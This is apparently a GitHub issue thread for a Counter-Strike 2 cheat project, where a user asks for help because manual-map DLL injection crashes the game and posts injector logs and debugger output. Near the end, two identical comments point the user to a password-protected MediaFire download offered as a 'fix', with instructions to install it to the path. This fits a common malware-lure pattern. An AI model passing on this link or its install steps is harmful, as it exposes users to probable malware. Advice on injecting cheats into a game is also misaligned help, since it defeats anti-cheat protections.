### ISSUE TITLE
Manual Map injection issue

### ISSUE THREAD

**Issue by binkwastaken** [maecry/asphyxia-cs2#120]
**Describe the bug**
I've used the /Zc:threadSafeInit- and it still crashes cs2 when injecting.
The console opens but it doesn't say anything and instantly crashes the game.
I've tried many injectors and my own injector as well still same thing.

**To Reproduce**
Inject with any injector that uses manual mapper.

**Expected behavior**
help to be able to inject

**Screenshots**
its just a blank asphyxia console.
(Ik I'm dumb for making the 10000th injection issue but I need help :D)

**Comment by M3351AN** [comment]
#67

**Comment by binkwastaken** [comment]
Process pid: 25284
Mapping...
File ok
Mapped DLL at 000001D091A10000
Mapping info at 000001D030F00000
Shell code at 000001D030F10000
Data allocated
Thread created at: 000001D030F10000, waiting for return...
Process crashed, exit code: -1073741819
Error while mapping.
I assume you mean the injector debugger so this is what I have in the injector console (Sorry If I'm wrong I'm new to making internal cheats :D)

**Comment by M3351AN** [comment]
no, attach debugger to cs2.exe, then map dll, and u could found which stack that error occured

**Comment by binkwastaken** [comment]
WARNING: File verification failure. Unknown foreign dll.  Denied a request to load '\??\C:\Users\bink\Documents\asphyxia\build\Debug\cstrike.dll'
The thread 21600 has exited with code 0 (0x0).
The thread 15012 has exited with code 0 (0x0).
The thread 4732 has exited with code 1 (0x1).
The thread 18280 has exited with code 509528736 (0x1e5ecaa0).
Exception thrown at 0x00000270B5CD5464 in cs2.exe: 0xC0000005: Access violation reading location 0x0000000000000000.

**Comment by maecry** [comment]
It shows clearly that you need to fix some threadsafe stuffs cuz manual map lol that's why i dont plan on support it

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by binkwastaken** [comment]
alr thx
